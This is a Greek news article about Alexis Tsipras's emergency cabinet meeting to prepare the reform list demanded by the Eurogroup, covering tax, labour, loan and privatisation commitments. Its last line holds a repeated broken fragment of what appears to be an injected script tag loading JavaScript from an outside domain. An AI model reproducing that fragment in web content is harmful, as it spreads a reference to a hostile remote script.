Έκτακτο Υπουργικό συμβούλιο… Μαραθώνιος – Σε 40 ώρες πρέπει να παραδοθούν τα νέα μέτρα

Σε μαραθώνιο εξελίσσεται η έκτακτη συνεδρίαση του κυβερνητικού συμβουλίου, όπου ο Αλέξης Τσίπρας καθορίζει με τους υπουργούς του το πλάνο της ελληνικής πλευράς μέχρι τη Δευτέρα.

Το Eurogroup, μαζί με τους «θεσμούς», έχουν δώσει ξεκάθαρη διορία στην κυβέρνηση μέχρι το βράδυ της Δευτέρας για να καταθέσει τον κατάλογο με τις μεταρρυθμίσεις που προτίθεται να κάνει για να μπορέσουν οι εταίροι να την ελέγξουν και εφόσον ανάψουν το «πράσινο φως» το Eurogroup της Τρίτης θα επικυρώσει τη συμφωνία.

Τι ζητάει ο Αλέξης Τσίπρας από το υπουργικό συμβούλιο 

Σύμφωνα με τις τελευταίες πληροφορίες τόσο ο πρωθυπουργός όσο και ο Γιάνης Βαρουφάκης ενημερώνουν τους υπουργούς για τις εξελίξεις στις Βρυξέλλες και πλέον στο τραπέζι πέφτουν όλα τα «καυτά» ζητήματα που πρέπει να ολοκληρωθούν και να καταρτιστούν σε λίστα μέχρι τη Δευτέρα.

Η ελληνική κυβέρνηση έχει χρόνο μέχρι το βράδυ της Δευτέρας όπου θα πραγματοποιηθεί τηλεδιάσκεψη μεταξύ ΔΝΤ (Λαγκάρντ), ΕΚΤ (Ντράγκι) και Κομισιόν (Μοσκοβισί), ωστόσο, κυβερνητικές πηγές αναφέρουν ότι δύσκολα ο κατάλογος που θα σταλεί θα είναι κοστολογημένος.

Η εξήγηση είναι πως η ελληνική πλευρά δεν μπορεί να γνωρίζει από πριν τα «νούμερα» και για το λόγο αυτό δεν θέλει να δεσμευθεί.

Τι θα περιλαμβάνει η λίστα Βαρουφάκη για την τελική συμφωνία 

Ο κατάλογος μεταρρυθμίσεων που θα στείλει η ελληνική κυβέρνηση θα εστιάζει σε τέσσερις βασικούς άξονες.

Αυτοί περιλαμβάνουν μέτρα για:

  • Την καταπολέμηση της φοροδιαφυγής, φοροαποφυγής
  • Την καταπολέμηση της διαφθοράς
  • Την μεταρρύθμιση της δημόσιας διοίκησης

Ειδικότερα, από τα όσα έχουν γίνει μέχρι στιγμής γνωστά, στη λίστα αναμένεται να μπει η ρύθμιση για τις 100 δόσεις (η Αθήνα εκτιμά ότι δεν είναι μονομερής ενέργεια και θα φέρει ζεστό χρήμα), η επαναφορά των συλλογικών συμβάσεων εργασίας, φορολογικές μεταρρυθμίσεις, ανακατανομή του ΕΣΠΑ, αλλά και σημεία από την εργαλειοθήκη του ΟΟΣΑ.

Ποιες είναι οι οκτώ δεσμεύσεις που «καίνε»

Ωστόσο, η έγκριση της λίστας μόνο υγιεινός περίπατος δεν θα είναι, καθώς πολλές από τις δεσμεύσεις της κυβέρνησης αποτελούν “κόκκινο” πανί, ειδικά για το Βερολίνο. Ακόμα κι αν περάσει, πάντως, από το πρώτο «χτένισμα», που θα γίνει την Τρίτη, το διάστημα που μεσολαβεί ως το τέλος Απριλίου θα είναι «καυτό», αφού θα απαιτηθούν εξειδικεύσεις, στόχοι και κοστολόγηση.

Κατ’ αρχάς, η βελτιωμένη εκδοχή της ρύθμισης των 100 δόσεων θεωρείται από την κυβέρνηση ότι δεν έχει δημοσιονομικό κόστος κι ως εκ τούτου θα περάσει. Όπως όλα δείχνουν θα γίνουν, όμως, τροποποιήσεις σε σχέση με τις αρχικές ανακοινώσεις, έτσι ώστε να δοθεί η εντύπωση της άφεσης αμαρτιών, ειδικά στους συστηματικούς κακοπληρωτές.

Για τους πλειστηριασμούς πρώτης κατοικίας και τα κόκκινα δάνεια νοικοκυριών- επιχειρήσεων, από τις διαβουλεύσεις με τους εταίρους εξαρτάται όχι μόνο το χρονοδιάγραμμα αλλά και το εύρος των παρεμβάσεων. Ειδικά όσον αφορά στα “κόκκινα” δάνεια, έχει γίνει, πλέον, κατανοητό ότι χωρίς τη σύμφωνη γνώμη της ΕΚΤ δεν μπορεί να προχωρήσει τίποτε.

Ως “κλειδί” χαρακτηρίζονται τα περίπου 11 δισ ευρώ του ΤΧΣ, που πλέον μεταφέρονται στον EFSF και μπορούν να χρησιμοποιηθούν μόνο για την ανακεφαλαιοποίηση των τραπεζών, αφού θεωρείται ότι μπορούν να λειτουργήσουν ως “μαξιλάρι” για ενδεχόμενες διαγραφές δανείων που θα χαρακτηριστούν οριστικά ανείσπρακτα.

Οι πρωτοβουλίες για την αντιμετώπιση της ανθρωπιστικής κρίσης, με μέτρα για την ανακούφιση των ασθενέστερων, εξακολουθούν να χαρακτηρίζονται άμεσης προτεραιότητας. Το εύρος των παρεμβάσεων θα εξαρτηθεί από το δημοσιονομικό κόστος, το οποίο είναι σε συνάρτηση με τον αριθμό των εν δυνάμει δικαιούχων. Το βασικό επιχείρημα της Αθήνας είναι οι δείκτες της ανεργίας- κυρίως της μακροχρόνιας- και οι δείκτες της φτώχειας, που βρίσκονται σε πρωτόγνωρα για τη χώρα επίπεδα.

“Αγκάθι” της λίστας των δεσμεύσεων αποτελεί το “πακέτο” των εργασιακών σχέσεων, όπου συμπεριλαμβάνεται η σταδιακή αύξηση του κατώτατου μισθού. Το βασικό επιχείρημα της Αθήνας είναι ότι θα γίνουν μεταρρυθμίσεις που θα διασφαλίσουν με άλλον τρόπο την ανταγωνιστικότητα της οικονομίας.

Ωστόσο, ήδη Βερολίνο και ΔΝΤ έχουν εκφράσει ζωηρές επιφυλάξεις για το κατά πόσο πρέπει να αναστραφούν οι παρεμβάσεις των τελευταίων ετών.

Και οι περικοπές στις συντάξεις και οι αλλαγές στο ασφαλιστικό, θα απουσιάζουν από τη λίστα των μεταρρυθμίσεων που θα προτείνει η κυβέρνηση, αφού αποτελούν βασική παράμετρο της κυβερνητικής πολιτικής. Τα εν λόγω μέτρα χαρακτηρίζονται έντονα υφεσιακά, αλλά οι δανειστές υποστηρίζουν ότι η βιωσιμότητα του συστήματος δεν επιτρέπει άλλες κινήσεις.

Η επαναπρόσληψη των υπαλλήλων που απολύθηκαν λόγω διαθεσιμότητας, θεωρείται ότι είναι χωρίς δημοσιονομικό κόστος και χωρίς να ανατρέπει το στόχο για περιορισμό του Δημοσίου, καθώς η επίσημη θέση είναι ότι οι προσλήψεις αυτές θα συνυπολογιστούν στις 15.000 που ήταν ήδη προγραμματισμένες. Τα αδύναμα σημεία της ελληνικής θέσης είναι ότι οι νέες προσλήψεις θα γίνονταν με άλλα κριτήρια π.χ. εξειδικευμένο προσωπικό κι ότι δημιουργεί σοβαρό πρόβλημα στα εγκεκριμένα οργανογράμματα η ενεργοποίηση οργανικών θέσεων που έχουν καταργηθεί, όπως αυτές των καθαριστριών του υπουργείου Οικονομικών.

Ο νέος Φόρος Ακινήτων, που θα αντικαταστήσει τον ΕΝΦΙΑ, δεν αναμένεται να φτάσει στη Βουλή πριν από τον Ιούνιο και το ζητούμενο είναι να καλυφθεί έστω εν μέρει η απώλεια περίπου 2 δισ ευρώ. Πρόκειται σαφώς για το πιο χαρακτηριστικό παράδειγμα μέτρου με δημοσιονομικό κόστος, ωστόσο η επιτυχής έκβαση του κυβερνητικού σχεδιασμού περνάει κυρίως από το πού θα τεθεί ο πήχης του φετινού πρωτογενούς πλεονάσματος και δευτερευόντως από το αν εξασφαλίζονται ισοδύναμα έσοδα από το λαθρεμπόριο καυσίμων- τσιγάρων, όπως επιμένει το υπουργείο Οικονομικών.

Όσον αφορά στις ιδιωτικοποιήσεις θα εξετάζονται κατά περίπτωση και έχει ήδη επισημανθεί ότι οι συμβασιοποιημένες δεν θα ανατραπούν. Ήδη υπάρχουν, πάντως, αντιδράσεις στο Βερολίνο για την ακύρωση του διαγωνισμού που αφορούσε στα περιφερειακά αεροδρόμια. Σημειώνεται ότι ο φάκελος των ιδιωτικοποιήσεων δεν αφορά μόνο στη διαπραγμάτευση για το δημοσιονομικό αλλά κυρίως στις διαβουλεύσεις για το Χρέος, με δεδομένο ότι ένα “κομμάτι” από την προσδοκώμενη μείωση του και συγκεκριμένα περίπου 11,5 δισ ευρώ, έχει προγραμματιστεί να προέλθει από τις αποκρατικοποιήσεις.

Αντιμέτωπος με ενδοκυβερνητικές ενστάσεις ο πρωθυπουργός

Κατά τη σημερινή συνεδρίαση του κυβερνητικού συμβουλίου δεν αποκλείεται να υπάρξουν και σοβαρές ενστάσεις κυρίως από εκείνα τα στελέχη που εκφράζουν την αριστερή πλατφόρμα, καθώς ήδη εκφράζεται η αγωνία μήπως το “πάγωμα” του προγράμματος της Θεσσαλονίκης οδηγήσει σε μειωμένη στήριξη από τον λαό

Τσίπρας: Θα έχουμε έτοιμη τη λίστα μέχρι το πρωί της Δευτέρας

Κατά τη διάκρεια της συνεδρίασης του κυβερνητικού συμβουλίου, ο πρωθυπουργός, βγήκε για λίγο από την αίθουσα για να τονίσει στους δημοσιογράφους ότι η κυβέρνηση παραμένει σε πλήρη συνεννόηση με θεσμούς και εταίρους.

«Μέσα στο σαββατοκύριακο θα είναι καταρτιστεί η λίστα και θα είναι έτοιμη μέχρι το πρωί της Δευτέρας».

«Μεικτά» μηνύματα από την Ευρώπη

Την ίδια στιγμή, κι ενώ τα ευρωπαϊκά μέσα ενημέρωσης ερμηνεύουν την συμφωνία ποικιλοτρόπως,  Ευρωπαίοι πολιτικοί και αξιωματούχοι εμφανίζονται επιφυλακτικοί για τη συμφωνία.

Οι περισσότερες χώρες ζητούν σαφείς προτάσεις από την Ελλάδα τη Δευτέρα, ενώ, οι Γερμανοί είναι εκείνοι που αναμένεται να ασκήσουν ξανά τις μεγαλύτερες πιέσεις.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>